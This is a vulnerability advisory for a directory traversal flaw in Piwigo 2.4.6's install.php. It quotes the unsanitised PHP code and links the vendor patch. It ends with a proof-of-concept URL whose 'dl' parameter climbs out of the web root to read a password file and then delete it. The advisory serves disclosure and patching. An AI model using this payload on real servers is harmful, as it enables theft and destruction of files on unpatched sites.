Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability Vendor: Piwigo project Product web page: http://www.piwigo.org Affected version: 2.4.6 Summary: Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. Desc: Input passed to the 'dl' parameter in 'install.php' script is not properly sanitised before being used to get the contents of a resource or delete files. This can be exploited to read and delete arbitrary data from local resources with the permissions of the web server via directory traversal attack. ==================================================================== /install.php: ------------- 113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) 114: { 115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; 116: header('Cache-Control: no-cache, must-revalidate'); 117: header('Pragma: no-cache'); 118: header('Content-Disposition: attachment; filename="database.inc.php"'); 119: header('Content-Transfer-Encoding: binary'); 120: header('Content-Length: '.filesize($filename)); 121: echo file_get_contents($filename); 122: unlink($filename); 123: exit(); 124: } ==================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5127 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php Vendor Patch: http://piwigo.org/bugs/view.php?id=2843 15.02.2013 -- http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt